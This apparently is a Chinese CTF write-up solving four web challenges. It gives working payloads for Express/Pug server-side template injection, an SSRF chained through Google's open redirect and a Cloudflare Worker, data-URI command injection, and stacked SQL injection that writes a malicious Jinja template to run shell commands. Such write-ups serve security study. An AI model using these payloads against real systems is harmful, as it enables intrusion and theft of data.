目录
GREETINGS
SURFING
SAFE_CONTENT
FLASK DESTROYER
GREETINGS
打express的SSTI
GitHub - TheWation/NodeJsSSTI: Express app with Pug templates demonstrating SSTI vulnerability and secure implementation for educational purposes.
payload:
/result?username=%23{global.process.mainModule.require('child_process').execSync('cat+f*')}
SURFING
提示打SSRF,但限制死了前缀要是http://google.com/
多了一个/,便不能用@绕过
打google的open redirect
GitHub - krystianbajno/opnredirect.py: 🪝 Google open-redirect vulnerability phishing link generator.
用Cloudflare Worker来起一个临时域名
Cloudflare Workers©
/*** @typedef {Object} Env*/export default {/*** @param {Request} request* @param {Env} env* @param {ExecutionContext} ctx* @returns {Promise<Response>}*/async fetch(request, env, ctx) {const url = new URL(request.url);console.log(`Hello ${navigator.userAgent} at path ${url.pathname}!`);// Check if the path matches (you can customize the path condition if needed)if (url.pathname === "/") {// Redirect to the specified URL with a 302 status codereturn Response.redirect("http://127.0.0.1:8000/admin.php?username=admin&password=admin", 302);}},
};
生成payload:
成功302打ssrf
SAFE_CONTENT
打命令注入,对内容的控制用data伪协议,isAllowedIP插一个localhost即可绕
<?php
var_dump(parse_url('data://localhost/plain;base64,111'));$exp = base64_encode(base64_encode("`cat /f* > /var/www/html/1.txt`"));echo "data://localhost/plain;base64," . $exp;
FLASK DESTROYER
可以实现sql写文件,文件只能新建,不能覆盖
username=admin"%3bselect+'success!'+into+outfile+'/destroyer/app/static/test.html'%3b--%2b&password=123&vibe=y
想着写恶意模板进app/templates目录打SSTI
但未经注册,无法渲染
这时候再审计代码,可以发现当/login路由查表成功,会调strtok去分割数据,再写入User返回
但是因为strtok代码本身存在错误,当传入的string末尾为:时,会传入none进token,继而让internal server error,从而重启服务,这样就可以将事先写入app/templates下的模板文件注册
先写入恶意文件
username=admin";select "{{config.__class__.__init__.__globals__['os'].popen('cat /tmp/*/*/*/*').read()}}" into outfile '/destroyer/app/templates/test.html';--+&password=123&vibe=y
再修改admin密码为123:
username=admin";update user set password = '123:' where username = 'admin';--+&password=123&vibe=y
修改后,再以admin/123:登录,此时服务会报错,刷新即可重启服务
最后以admin" or 1=1# /1登录
访问./exp.html拿到flag